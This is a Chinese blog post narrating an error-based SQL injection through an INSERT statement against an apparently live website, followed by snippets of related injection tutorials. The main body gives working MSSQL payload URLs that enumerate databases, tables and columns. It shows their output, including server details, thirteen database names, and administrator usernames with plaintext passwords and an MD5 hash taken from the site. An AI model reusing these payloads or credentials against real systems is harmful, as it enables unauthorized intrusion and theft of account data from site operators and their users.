insert注入笔记

最新推荐文章于 2024-01-11 18:38:03 发布
最新推荐文章于 2024-01-11 18:38:03 发布
阅读量769 收藏
点赞数
分类专栏: Hacking 文章标签: insert null microsoft sql server 百度 bbs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6588313
版权


Author:昆仑男银

群里有人在问insert型的怎么注射,insert类型的我还没碰到过呢,就去看了看,做了一下笔记备忘。

http://www.kunlun.com/nanyin.aspx?ProID=49579′ 加一个点,报错

是insert类型的语句,百度了一下,对insert语句的注射大致有个了解,于是开始刺探信息。

提交:http://www.kunlun.com/nanyin.aspx?ProID=49579′,cast(@@version/**/as/**/int),null);–

不兼容…把int换成varchar,页面返回正常。。。百度一下,原来是mssql不允许将text或ntext型数据直接转换为int型

 要想爆出信息看来得找个varchar 或nvarchar类型的字段,把后面2个对换了一下位置,成功爆出。

提交:http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,cast(system_user/**/as/**/int));–

在将 nvarchar 值 ‘AFDataLogin’ 转换成数据类型 int 时失败。

很好,再接着爆信息,收集的一些如下。

version:Microsoft SQL Server 2005 – 9.00.4035.00 (Intel X86)……Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

servername:SQL2005  

host_name:IBM1 

db_name:kunlun

user_name:dbo

可以看出 web与数据库分离,看来想差异备份或log备份是不行的了,只能爆后台帐号、密码进后台了。 

先爆一下库,构造

http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)–

修改第最后一个dbid的值,爆出13个库…

1:master

2:tempdb

3:model

4:msdb

5:kunlun_BBS

6:kunlun

7:New_AF

8:AF_Back

9:Console

10:Newkunlun

11:Newkunlun2

12:Oldkunlun

13:NewBBS

接下来爆表名

构造: http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype=’u'/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype=’u'))– 

修改第二个top的值,从0递增上去。爆第六张表时很开心,马上去爆字段、密码。

1:AF_UserAccount

2:YX_Unit

3:AF_UnionCompany

4:YX_FlashXZ

5:AF_UserPointLogs

6:Buy_Admin

爆指定表Buy_Admin的字段
 
http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)))–

爆出来了,一样是修改第二个top的值。
 
密码:af_APass

ID:af_ID

用户:af_AName


看到name和pass很开心啊,马上爆内容。

提交:
http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)–

爆出来了,还是明文的,呵呵,找后台登录。

hjbadmin    hjbmanager 

  yck’          yck

 高兴早了,怎么也登录不了。唉,再爆表把,爆到第N张,看见YX_Manage,开心了,这回没错了,爆字段爆内容

YX_AdminUser  YX_Pwd

hgnadmin   50252EC697150CC9AA69A47333C716B8

可惜啊,md5解密不出….到这里差不多就结束了。很晚了。 

哦,忘了说了,这个是dbo权限,呵呵。
7禧
关注
专栏目录
25-5 SQL 注入攻击 - insert注入
weixin_43263566的博客
03-09 552
流量分析主要涵盖三个方面:报错注入、函数注入和盲注。这些都是 SQL 注入攻击的常见形式,而工具如 SQLMap 可用于检测和利用这些漏洞。注入手段:使用or逻辑运算符。使用pikachu靶场练习。
BUGKu中的Insert注入
Mikasa
03-28 651
这道题因为是先输出的IP的信息,然后再将IP存入了数据库中,并且关闭了所有的报错提示。 因此用时间注入的方式比较好 首先我们先认识一个新的Python中的time模块,time.time()返回当前的时间,只要我们在发送数据包之前以及收到返回包之后各设置一个,就可以通过判断两时间之差确认我们判断的字符!!!! 其实没有什么难的,有相对好点的其他语言基础,相信能很快写出来 当然这道题还不是简单的时...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQLinsert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
insert注入
weixin_46784800的博客
11-10 2054
insert注入 insert用法 insert在数据库中可以直接插入数据,同时,insert还可以在数据库查询语句中用作字符串替换,例如: select insert("admin", 1, 1, ""); 上述语句查询结果为: 可以看见,insert语句可以将字符串指定位置的指定长度替换为指定字符串,该功能的insert语法为: INSERT(s1,x,len,s2) 其中的s1为目标字符串,x为替换的起始位置,len为替换的长度,s2为替换的字符串。通过改变len的值,可以获取到不同长度的字符串:
bugku学习之37.insert into注入
s11show_163的博客
03-04 608
考察: xff头注入 insert into 注入格式是1'+(注入语句)# 延时注入 逗号屏蔽$ip_arr = explode(',', $ip);下无法使用if注入以及对substr函数修改引出的启发 给出了源码提示: <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_...
SQL注入(自学笔记
woqusss的博客
08-10 374
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
CTF-SQL注入笔记
朋克归零膏的博客
09-27 439
sqli笔记
postgresql注入笔记
Coisini的博客
05-26 1457
’ and chr(97)%7c%7cchr(97)=chr(97)%7c%7cchr(97)– http://tendai.or.jp/journal/kiji.php?nid=98 http://heiankyo.co.jp/shopping/note.php?pid=1163569’ and 1=cast((select relname from pg_stat_user_tables li...
sql注入学习笔记
cherrie007的博客
07-20 447
内容纲要: 1、 updatexml() 报错 2、 extractvalue() 报错 3、 floor()、count(*)、random()报错 4、 name_const() 报错一、updatexml() 【限制了最大长度为32位】 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_docum
MyBatis-Plus 学习笔记.pdf
08-30
MyBatis-Plus 学习笔记 MyBatis-Plus 是一个基于 MyBatis 的增强工具,旨在简化开发、提高效率。它提供了许多实用的特性和功能,例如无侵入、损耗小、强大的 CRUD 操作、支持 Lambda 形式调用、支持多种数据库、...
bugku—INSERT INTO注入解答
Just for funnnnnnnnnnnn
01-10 2200
本来不打算单独的ctf题目成文,但是这个题写payload快看花我的眼睛了,不写一篇记录一下代码对不住我的眼睛。 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $i...
SQL注入——insert注入(pikachu)
W小哥
01-14 3859
第一步:访问目标网站,点击注册 第二步:填写注册内容并使用burpsuite抓取数据包,右键send toRepeater 第三步:数据包不修改,正常发送,返回内容如下所示 第四步:测试注入点 数据包中注册用户username修改,返回页面如下所示 第五步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,concat(0...
php+mysql+into_PHP+MySQLInsert Into数据插入用法分析_php技巧
weixin_39959349的博客
01-28 118
本文实例讲述了PHP+MySQLInsert Into数据插入用法。分享给大家供大家参考。具体如下:INSERT INTO 语句用于向数据库表中插入新纪录。向数据库表插入数据INSERT INTO 语句用于向数据库表添加新纪录。语法:INSERT INTO table_nameVALUES (value1, value2,....)您还可以规定希望在其中插入数据的列:INSERT INTO ta...
bugku------INSERT INTO 注入
bylfsj的博客
09-30 484
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
insert 注入逻辑
weixin_46601374的博客
04-01 246
现在的孩子,分手专挑情人节,告白专挑愚人 MYSQL注入什么是DML?INSERT语句基本使用INSERT语句报错逻辑INSERT留后门逻辑 情人节表白,人家不听。愚人节表白,人家不信。清明节表白,人家不应。 什么是DML? DML:数据操作语言 功能:主要是对表,视图等对象进行查询,插入,更新和删除操作 包括: select查询 insert插入 update更新 delete删除 INSERT语句基本使用 INSERT INTO users(uid,uname,password,isadmin)
Pikachu SQL注入insert/update注入
最新发布
SS_liang的博客
01-11 1947
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1142
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
insert/update注入
Ethan024的博客
03-30 1015
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
bugku INSERT INTO注入(基于时间的盲注,详细教程)
wssmiss的博客
07-22 1454
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的盲注 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值